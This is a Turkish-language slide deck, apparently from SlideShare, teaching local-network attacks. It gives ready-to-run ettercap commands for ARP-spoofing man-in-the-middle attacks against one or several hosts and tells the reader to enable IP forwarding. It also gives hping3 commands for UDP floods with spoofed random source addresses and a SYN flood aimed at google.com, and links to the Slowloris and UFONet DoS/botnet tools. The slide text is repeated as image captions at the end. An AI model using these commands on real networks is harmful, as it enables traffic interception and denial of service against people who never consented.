1. AĞ İÇİ SALDIRILAR DNS SPOOF VE ARP SPOOF SALDIRILARI VE
DOS/DDOS SALDIRILARI
ETTERCAP
Ettercap ‘ı çalıştırmadan önce ettercap ‘ın konfigürasyon dosyasını düzenlememiz
gerekecektir. İlgili düzenlemeler aşağıdaki resimlerde gösterilmiştir.
Not: Konfiguresyon dosyasını herhangi bir metinde açabilirsiniz.
İlgili düzenleme dosyası şu dizindedir.
┌─[root@kali]─[~] leafpad /etc/ettercap/etter.conf
2. AĞ İÇERİSİNDE SALDIRININ BAŞLATILMASI
BU BÖLÜMDE TEK KULLANICI İÇİN SALDIRI ANLATILMIŞTIR.
Kullanılan komut aşağıdaki şekildedir.
Komutlar: -T text query anlamı “bana gelen verileri text şeklinde raporla(göster)”.
q: quiet “anlamı bana değerleri sessizce getir.”--------> -T parametresi ile birlikte kullanılır.
-M: Modül anlamına geliyor. Kullandığımız modül arp spoof
-i: anlamı interfaces Ağ ara yüzün adı
┌─[root@kali]─[~] ettercap -Tq -M arp:remote -i eth0 /192.168.1.1// /192.168.1.36//
BİRDEN FAZLA KULLANICI İÇİN YAPILACAK SALDIRI
Birden fazla kullanıcıya saldırı yapılacak ise İP adresleri arasına virgül koyulmalıdır.
Kullanımı aşağıdaki şekildedir.
┌─[root@kali]─[~] ettercap -Tq -M arp:remote -i eth0 /192.168.1.1//
/192.168.1.36,192.168.1.35//
ETTERCAP-GUI
Bu kısımda ise ettercap ‘ı görsel olarak işleyeceğiz. Ettercap ‘ın görsel arayüz halini açmak
kali ‘nin araçlar menüsünden ya da terminale aşağıdaki komut girerek açabiliriz.
┌─[root@kali]─[~] ettercap -G
Ettercap ‘ın görsel arayüz aşağıdaki ilgili resimdeki gibi ‘dir.
3. ÖNEMLİ: Ancak arp zehirlenmesi(MITM) yapılmadan önce aşağıdaki ayar yapılmalıdır.
Aşağıda bulunan resimdeki ayar İP FORWARDİNG ‘i aktif etmektedir. İlgili dosyanın
içerisindeki 0(sıfır) değerini 1 olarak değiştireceğiz.
IP Forwarding Nedir ?
IP Forwarding işletim sistemlerin trafiği yönlendirmesi için ( bir router olarak davranması)
kullanılan bir özelliktir. Eğer sistemde routing yapacaksınız bu özellik aktif edilmelidir.
4. DOS/DDOS SALDIRILARI
Dos: Dos, tek bir sunucu tarafından saldırı türü ‘dür. Ancak tek sunucu tarafından yönetilen
ve birden fazla sunucu kullanılıyorsa bunu Botnet olarak adlandırabiliriz. Fakat Botnet
sistemler sadece Dos/Ddos sistemler için kullanılmamaktadır. Bir çok faaliyet için botnet
türleri bulunmaktadır.
Ddos: Birden fazla sunucu tarafından yapılan saldırı türü ‘dür.
HPİNG3
Hping gelişmiş paket gönderim araçlarından biri ‘dir. Kali içerisine kurulu olarak
gelmekmektedir. Kullanım parametreleri aşağıdaki şekildedir.
┌─[root@kali]─[~] hping3 -h
Saldırı Yöntemi ve Parametreler
┌─[root@kali]─[~] hping3 --faster --data 150 --udp 192.168.1.86 --count 1000 --file
/root/Test.txt --random-source
--faster: Paketleri daha hızlı gönderir.
--data: byte cinsinden gönderilecek data sayışımı ifade eder.
--udp: Hangi protokol üzerinden saldırı yapılacağını belirtir.
--count: Gönderilecek data sayısını belirtir.
--file: Hedef sisteme mesaj odaklı saldırı yapılmasını sağlar.
--random-source: Rastgele ipler üzerinden saldırı yapar.
5. Hping ile Syn Flood saldırısı
┌─[root@kali]─[~] hping3 -S –flood -p 80 google.com
Slowloris Scriptinin Kullanımı
Slowloris aşağıdaki bağlantıdan indirilebilir.
Github: https://github.com/Ogglas/Orignal-Slowloris-HTTP-DoS
6. BOTNETLER
Botnet, kötü amaçlı yazılımların bilgisayarlarda dağıtılıp bu yazılımı kullanan veya yükleyen
bilgisayarlara çeşitli görevler vermeye yarayan saldırı amaçlı yazılımlardır. Bot kelimesi
robot kelimesinin kısaltılmışıdır ve Botnet ‘in temeli DDoS saldırılarından oluşmaktadır.
UFONET
Ufonet ‘i aşağıdaki bağlantıdan indirebilirsiniz.
Github: https://github.com/epsylon/ufonet
Hazırlayan: Mehmet Emin Doğan
İletişim: hacksectr@gmail.com, mehmeteminacu20@gmail.com
![AĞ İÇİ SALDIRILAR DNS SPOOF VE ARP SPOOF SALDIRILARI VE
DOS/DDOS SALDIRILARI
ETTERCAP
Ettercap ‘ı çalıştırmadan önce ettercap ‘ın konfigürasyon dosyasını düzenlememiz
gerekecektir. İlgili düzenlemeler aşağıdaki resimlerde gösterilmiştir.
Not: Konfiguresyon dosyasını herhangi bir metinde açabilirsiniz.
İlgili düzenleme dosyası şu dizindedir.
┌─[root@kali]─[~] leafpad /etc/ettercap/etter.conf](https://image.slidesharecdn.com/sniffingveservisdiibirakmasaldirilari-240219111817-a26d1146/85/sniffing-ve-servis-dii-birakma-saldirilari-1-320.jpg)
![AĞ İÇERİSİNDE SALDIRININ BAŞLATILMASI
BU BÖLÜMDE TEK KULLANICI İÇİN SALDIRI ANLATILMIŞTIR.
Kullanılan komut aşağıdaki şekildedir.
Komutlar: -T text query anlamı “bana gelen verileri text şeklinde raporla(göster)”.
q: quiet “anlamı bana değerleri sessizce getir.”--------> -T parametresi ile birlikte kullanılır.
-M: Modül anlamına geliyor. Kullandığımız modül arp spoof
-i: anlamı interfaces Ağ ara yüzün adı
┌─[root@kali]─[~] ettercap -Tq -M arp:remote -i eth0 /192.168.1.1// /192.168.1.36//
BİRDEN FAZLA KULLANICI İÇİN YAPILACAK SALDIRI
Birden fazla kullanıcıya saldırı yapılacak ise İP adresleri arasına virgül koyulmalıdır.
Kullanımı aşağıdaki şekildedir.
┌─[root@kali]─[~] ettercap -Tq -M arp:remote -i eth0 /192.168.1.1//
/192.168.1.36,192.168.1.35//
ETTERCAP-GUI
Bu kısımda ise ettercap ‘ı görsel olarak işleyeceğiz. Ettercap ‘ın görsel arayüz halini açmak
kali ‘nin araçlar menüsünden ya da terminale aşağıdaki komut girerek açabiliriz.
┌─[root@kali]─[~] ettercap -G
Ettercap ‘ın görsel arayüz aşağıdaki ilgili resimdeki gibi ‘dir.](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)